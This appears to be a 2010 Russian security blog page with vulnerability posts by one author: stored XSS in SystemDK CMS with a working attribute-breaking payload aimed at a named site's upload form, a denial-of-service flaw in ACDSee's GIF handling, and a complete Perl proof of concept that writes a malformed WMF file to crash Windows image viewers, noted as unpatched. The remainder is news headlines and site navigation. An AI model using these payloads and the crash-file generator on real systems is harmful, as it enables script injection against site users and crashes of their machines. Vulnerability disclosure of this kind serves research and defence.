РУС |  ENG
на главную  RSS
 

Отказ в обслуживаний

Список блогов Текущий блог
Войти Регистрация


 azmМножественные XSS в SystemDK CMS
Обнаружил вот такие косячки за SystemDK CMS.
Активные XSS:

1. http://www.systemdk.ru/dkmodules.php?...o=add_file

Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле "Домашняя страница".)

http://"style="background:url(javascript:alert(1))/**

[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подробнее>>[/URL
Теги: Множественные XSS в SystemDK CMS Постоянный адрес |  Просмотров: 339 |  Комментариев: 0


 azmОтказ в обслуживании при обработке GIF в ACDSee
Удаленный пользователь может с помощью специально сформированного GIF изображения вызвать отказ в обслуживании ACDSee Viewer. Уязвимость существует из-за ошибки при обработке элемента Block Size структуры GIF Graphic Control Extension Block. Уязвима версия ACDSee 8.2.1 и более ранние.
Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.
Эксплоит: acdsee_dos.c
Теги: Отказ в обслуживании при обработке GIF в ACDSee Постоянный адрес |  Просмотров: 234 |  Комментариев: 0


 azmПодробнее о баге тут:
SecurityBlogs
Теги: http://www.securityblogs.ru/index.php?act=1&id=4 Постоянный адрес |  Просмотров: 338 |  Комментариев: 0


 azmОтказ в обслуживаний в WMF

Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by AzM";
print "\n\ngenerating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x00\x00";
print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "Ok\n";
Постоянный адрес |  Просмотров: 1944 |  Комментариев: 9





«   Февраль 2010   »

Пн Вт Ср Чт Пт Сб Вс
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
             



Топ-менеджер Microsoft настаивает на введении прав для пользователей Сети

Перед выходом в Интернет каждый пользователь ПК должен будет пройти обязательный курс подготовки и ...

просмотры: 3806, отзывы: 99

Аддоны для Firefox заражены троянскими программами

Компания Mozilla сегодня выпустила два экстренных бюллетеня по информационной безопасности, где гово ...

просмотры: 5455, отзывы: 106

Windows 7 уничтожает аккумуляторы ноутбуков

Посетители форума Microsoft TechNet утверждают, что срок службы аккумулятора заметно сократился посл ...

просмотры: 8144, отзывы: 86

Хакеры поздравили Тимошенко с поражением

Сайт премьер-министра Украины Юлии Тимошенко был взломан хакерами. Вместо стартовой страницы на сайт ...

просмотры: 3756, отзывы: 46

ФБР хочет следить за пользователями Интернета

На днях директор ФБР Роберт Мюллер заявил, что он собирается добиваться того, чтобы провайдеры из СШ ...

просмотры: 1783, отзывы: 44

Доктор Веб: Первая вирусная эпидемия 2010 года

В январе 2010 года основное количество обращений пользователей по поводу активных заражений было свя ...

просмотры: 4609, отзывы: 75

В России Trojan.Winlock заразил миллионы компьютеров

Только за январь число пострадавших в России от блокировщиков Windows составило несколько миллионов ...

просмотры: 13570, отзывы: 123

Windows 8 может выйти в 2011 году

По новой информации, клиентская операционная система Windows 8 выйдет уже в следующем году. Известно ...

просмотры: 7056, отзывы: 97

Суд закрыл сайт, распространяющий курительные смеси

Орджоникидзевский районный суд г. Екатеринбурга вынес решение по иску прокурора Орджоникидзевского р ...

просмотры: 1239, отзывы: 41

Обнаружена уязвимость в Internet Explorer

В опубликованном на сайте Microsoft уведомлении говорится, что уязвимость может эксплуатироваться зл ...

просмотры: 3124, отзывы: 50

Microsoft повысит компьютерную грамотность россиян

Инициатива рассчитана на три года, предполагаемый объем инвестиций составит 151,5 млн рублей. До кон ...

просмотры: 2274, отзывы: 54

Американский студент исследовал файлы в торрент-сетях

В ходе исследования выяснилось, что 99% файлов, проходящих через торрент-сети, содержат нелиценз ...

просмотры: 3359, отзывы: 47

Осторожно ФИШИНГ!!!

Дата: 09 февраля, 2010
Автор: Александр

W2K8

Дата: 06 февраля, 2010
Автор: l4r4n

Системный администратор Unix/Linux

Дата: 21 декабря, 2009
Автор: Анастасия Пирогова

sec7x24.net: Информационная безопасность 7х24

Дата: 25 января, 2010
Автор: grub

билайн жульничает?

Дата: 13 января, 2010
Автор: phoenix







Подписка на рассылки